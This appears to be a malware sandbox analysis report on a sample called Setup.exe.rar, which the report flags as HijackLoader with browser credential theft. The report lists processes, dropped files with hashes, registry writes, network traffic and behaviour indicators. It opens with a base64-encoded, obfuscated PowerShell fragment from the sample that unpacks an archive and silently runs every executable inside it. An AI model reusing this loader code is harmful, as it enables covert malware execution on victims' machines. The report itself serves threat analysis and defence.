bQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtACkACgAKACAAIAAgACAAJABtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQAuAEMAbwBwAHkASABlAHIAZQAoACQAbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAC4ASQB0AGUAbQBzACgAKQAsACAAMgAwACkACgAKACAAIAAgACAAJABxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtACAALQBGAGkAbAB0AGUAcgAgACoALgBlAHgAZQAgAC0AUgBlAGMAdQByAHMAZQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJABtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AIABpAG4AIAAkAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAcQBxAHEAKQAgAHsACgAgACAAIAAgACAAIAAgACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0ALgBGAHUAbABsAE4AYQBtAGUAIAAtAE4AbwBOAGUAdwBXAGkAbgBkAG8AdwAgAC0AVwBhAGkAdAAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAjAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAKAH0ACgAKACYAIAAkAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQBtAG0AbQAgAD4AIAAkAG4AdQBsAGwAIAAyAD4AJgAxAA==

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

ensuer.com

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll

5560

C:\WINDOWS\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}

C:\Windows\SysWOW64\dllhost.exe

svchost.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

COM Surrogate

Version:

10.0.19041.3636 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ucrtbase.dll
c:\windows\syswow64\combase.dll

Add for printing

Total events

25 390

Read events

25 346

Write events

Delete events

Modification events


(PID) Process:	(6624) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	3
Value: C:\Users\admin\Desktop\preferences.zip
(PID) Process:	(6624) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	2
Value: C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:	(6624) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	1
Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:	(6624) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:	write	Name:	0
Value: C:\Users\admin\Desktop\Setup.exe.rar
(PID) Process:	(6624) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	name
Value: 120
(PID) Process:	(6624) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	size
Value: 80
(PID) Process:	(6624) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	type
Value: 120
(PID) Process:	(6624) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:	write	Name:	mtime
Value: 100
(PID) Process:	(6624) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths
Operation:	write	Name:	name
Value: 256
(PID) Process:	(6624) WinRAR.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\ArcColumnWidths
Operation:	write	Name:	size
Value: 80

Add for printing

Executable files

172

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
7004	more.com	C:\Users\admin\AppData\Local\Temp\kotthnfysvspd		—
		MD5:—	SHA256:—
6200	more.com	C:\Users\admin\AppData\Local\Temp\nreqmbdgttleu		—
		MD5:—	SHA256:—
6076	powershell.exe	C:\Users\admin\AppData\Local\Temp\20fb0aba-45b7-4605-a8ce-6eb6d36cd179.zip		compressed
		MD5:1047114E36AB7ECB34C6FE2842C45E68	SHA256:7F2AE730D1009672557FA130C04276D92BE186FFEC5595AAE1ABE86D5BEE83F7
6076	powershell.exe	C:\Users\admin\AppData\Local\20fb0aba-45b7-4605-a8ce-6eb6d36cd179\api-ms-win-core-processthreads-l1-1-1.dll		executable
		MD5:9C9B50B204FCB84265810EF1F3C5D70A	SHA256:25A99BDF8BF4D16077DC30DD9FFEF7BB5A2CEAF9AFCEE7CF52AD408355239D40
6960	Setup.exe	C:\Users\admin\AppData\Local\Temp\12112012		image
		MD5:C5B32D7E171647B6F6CCB3B1E3EF7F09	SHA256:A94E71A280B2516FB3E9E3114269C515F6A1318153760B35CC6C24C7564C8874
6960	Setup.exe	C:\Users\admin\AppData\Local\Temp\122dc7f5		binary
		MD5:B7297830A96B5B408C04F4AF116BAC39	SHA256:0CC22CDF6615021B844EF96A9C3C1CAC0EB595D9562B6F51B8087143F1F96C16
6076	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kj5hsw2d.lpr.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7004	more.com	C:\Users\admin\AppData\Local\Temp\ensuer.com		executable
		MD5:3F58A517F1F4796225137E7659AD2ADB	SHA256:1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
3732	Setup.exe	C:\Users\admin\AppData\Local\Temp\142fa270		image
		MD5:C5B32D7E171647B6F6CCB3B1E3EF7F09	SHA256:A94E71A280B2516FB3E9E3114269C515F6A1318153760B35CC6C24C7564C8874
3732	Setup.exe	C:\Users\admin\AppData\Local\Temp\144aaf55		binary
		MD5:B7297830A96B5B408C04F4AF116BAC39	SHA256:0CC22CDF6615021B844EF96A9C3C1CAC0EB595D9562B6F51B8087143F1F96C16

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
4712	MoUsoCoreWorker.exe	GET	200	23.48.23.167:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
4712	MoUsoCoreWorker.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
5064	SearchApp.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D	unknown	—	—	whitelisted
1176	svchost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
6312	backgroundTaskHost.exe	GET	200	192.229.221.95:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D	unknown	—	—	whitelisted
7156	SIHClient.exe	GET	200	88.221.169.152:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl	unknown	—	—	whitelisted
7156	SIHClient.exe	GET	200	88.221.169.152:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl	unknown	—	—	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:137	—	—	—	whitelisted
244	RUXIMICS.exe	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
—	—	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4712	MoUsoCoreWorker.exe	23.48.23.167:80	crl.microsoft.com	Akamai International B.V.	DE	whitelisted
4712	MoUsoCoreWorker.exe	184.30.21.171:80	www.microsoft.com	AKAMAI-AS	DE	whitelisted
3220	svchost.exe	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
—	—	20.73.194.208:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
5064	SearchApp.exe	104.126.37.130:443	www.bing.com	Akamai International B.V.	DE	whitelisted
1176	svchost.exe	20.190.159.68:443	login.live.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted

DNS requests

Domain	IP	Reputation
crl.microsoft.com	23.48.23.167 23.48.23.141 23.48.23.176 23.48.23.145 23.48.23.143 23.48.23.139 23.48.23.156 23.48.23.159 23.48.23.140	whitelisted
www.microsoft.com	184.30.21.171 88.221.169.152	whitelisted
google.com	172.217.16.142	whitelisted
settings-win.data.microsoft.com	20.73.194.208 51.104.136.2	whitelisted
www.bing.com	104.126.37.130 104.126.37.131 104.126.37.139 104.126.37.145 104.126.37.144 104.126.37.152 104.126.37.146 104.126.37.128 104.126.37.137	whitelisted
login.live.com	20.190.159.68 20.190.159.23 20.190.159.75 40.126.31.67 20.190.159.73 20.190.159.0 20.190.159.64 40.126.31.69	whitelisted
ocsp.digicert.com	192.229.221.95	whitelisted
go.microsoft.com	23.218.210.69	whitelisted
arc.msn.com	20.103.156.88	whitelisted
fd.api.iris.microsoft.com	20.199.58.43	whitelisted

Threats

No threats detected

Add for printing

No debug info

General Info

Setup.exe.rar

785FEF3D3C8D2CC62A657A8C72FCBAEB

A9A973225667930D8375DA7F524D9D5B15AC0764

452A2E3930CC73210B276FECEC7BA64433A3AD89F398258C9A79DC419068F707

196608:BRn4NLPhbtyzAqUKK2iKR2p1EZeb1H55Z8s:r4x5btEAqyJKw151H5TF

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Executing a file with an untrusted certificate

Actions looks like stealing of personal data

Steals credentials from Web Browsers

Bypass execution policy to execute commands

Downloads the requested resource (POWERSHELL)

Changes powershell execution policy (Bypass)

HIJACKLOADER has been detected (YARA)

Known privilege escalation attack

SUSPICIOUS

Reads security settings of Internet Explorer

Starts application with an unusual extension

Starts the AutoIt3 executable file

Executable content was dropped or overwritten

BASE64 encoded PowerShell command has been detected

Starts POWERSHELL.EXE for commands execution

Base64-obfuscated command line is found

Creates new GUID (POWERSHELL)

Writes data to a memory stream (POWERSHELL)

Writes data into a file (POWERSHELL)

Process drops legitimate windows executable

The process drops C-runtime libraries

Starts itself from another location

Connects to unusual port

INFO

Executable content was dropped or overwritten

The process uses the downloaded file

Creates files or folders in the user directory

Manual execution by a user

Reads the computer name

Checks supported languages

Disables trace logs

Checks proxy server information

Create files in a temporary directory

Found Base64 encoded network access via PowerShell (YARA)

Found Base64 encoded file access via PowerShell (YARA)

Gets data length (POWERSHELL)

The executable file from the user directory is run by the Powershell process

Malware configuration

Static information

TRiD

EXIF

ZIP

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity